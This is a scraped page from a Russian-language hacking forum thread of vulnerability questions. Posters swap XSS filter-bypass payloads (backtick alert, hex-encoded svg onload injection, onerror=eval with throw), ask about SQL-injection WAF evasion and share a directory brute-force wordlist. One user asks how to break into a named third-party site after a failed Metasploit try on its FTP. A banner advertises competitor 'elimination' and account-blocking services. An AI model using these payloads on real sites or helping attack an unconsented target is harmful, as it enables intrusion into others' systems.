УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 268 из 296

268

Опции темы

Поиск в этой теме

Опции просмотра

#2671

04.09.2019, 21:36

Baskin-Robbins

Guest

Сообщений: n/a

Провел на форуме:
92829

Репутация: 212

Цитата:

Сообщение от Octavian

Octavian said:
↑
А чем можно заменить （）в
＜script＞alert(1)＜/script＞

пробуй alert`aaa`

вот тебе пример /threads/424991/page-17

но если отработает такая штука, то алерт не нужен

#2672

04.09.2019, 21:48

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

Цитата:

Сообщение от Baskin-Robbins

Baskin-Robbins said:
↑
пробуй alert`aaa`
вот тебе пример
/threads/424991/page-17
но если отработает такая штука, то алерт не нужен

Не выходя из ＜script＞нужно выполнить xss без ;()

#2673

06.09.2019, 14:54

karkajoi

Guest

Сообщений: n/a

Провел на форуме:
96779

Репутация: 5

Цитата:

Сообщение от man474019

man474019 said:
↑
hi
sqli very hard WAF
can u help ?
link:
link

Charencode helps bypass "The URI you submitted has disallowed characters.", but the vector fails.

#2674

06.09.2019, 15:51

crlf

Guest

Сообщений: n/a

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от Octavian

Octavian said:
↑
Не выходя из ＜script＞нужно выполнить xss без ;()

Код:

Code:
document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//

#2675

06.09.2019, 16:45

Bo0oM

Новичок

Регистрация: 26.12.2009

Сообщений: 4

Провел на форуме:
76437

Репутация: 5

Отправить сообщение для Bo0oM с помощью ICQ

Цитата:

Сообщение от crlf

crlf said:
↑

Код:

Code:
document.body.innerHTML="\x3c\x73\x76\x67\x2f\x6f\x6e\x6c\x6f\x61\x64\x3d\x61\x6c\x65\x72\x74\x28\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2e\x64\x6f\x6d\x61\x69\x6e\x29\x3e"//

Код:

Code:
onerror=eval;throw'=alert\x281\x29'

Больше нравится (с предварительной записью в window.name, который передается в рамках одного окна)

Код:

Code:
onerror=eval;throw window.name

#2676

08.09.2019, 23:28

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их

#2677

08.09.2019, 23:49

Baskin-Robbins

Guest

Сообщений: n/a

Провел на форуме:
92829

Репутация: 212

Цитата:

Сообщение от Octavian

Octavian said:
↑
Привет, поделитесь нормальным словарем для директорий, их много но всегда маловато их

миллиона тебе достаточно? много не всегда есть хорошо

Код:

Code:
https://github.com/foospidy/payloads/blob/master/owasp/dirbuster/directory-list-2.3-big.txt

#2678

11.09.2019, 17:26

November15

Guest

Сообщений: n/a

Провел на форуме:
767

Репутация: 0

http://e-learn.i5t.ru/ можно ли ,что-либо сделать?

#2679

11.09.2019, 19:38

fandor9

Guest

Сообщений: n/a

Провел на форуме:
169390

Репутация: 47

Цитата:

Сообщение от November15

November15 said:
↑
http://e-learn.i5t.ru/
можно ли ,что-либо сделать?

учиться можно, вот https://e-learn.i5t.ru/enrol/index.php?id=2 ))

#2680

11.09.2019, 20:32

November15

Guest

Сообщений: n/a

Провел на форуме:
767

Репутация: 0

Это да,но всё же касательно сайта.Я чекнул там вроде ftp порт открыт и мне интересно как это раскрутить(через msf выдаёт ошибку ,что иньекция выполнена,но сесси нет)

Цитата:

Сообщение от fandor9

fandor9 said:
↑
учиться можно, вот
https://e-learn.i5t.ru/enrol/index.php?id=2
))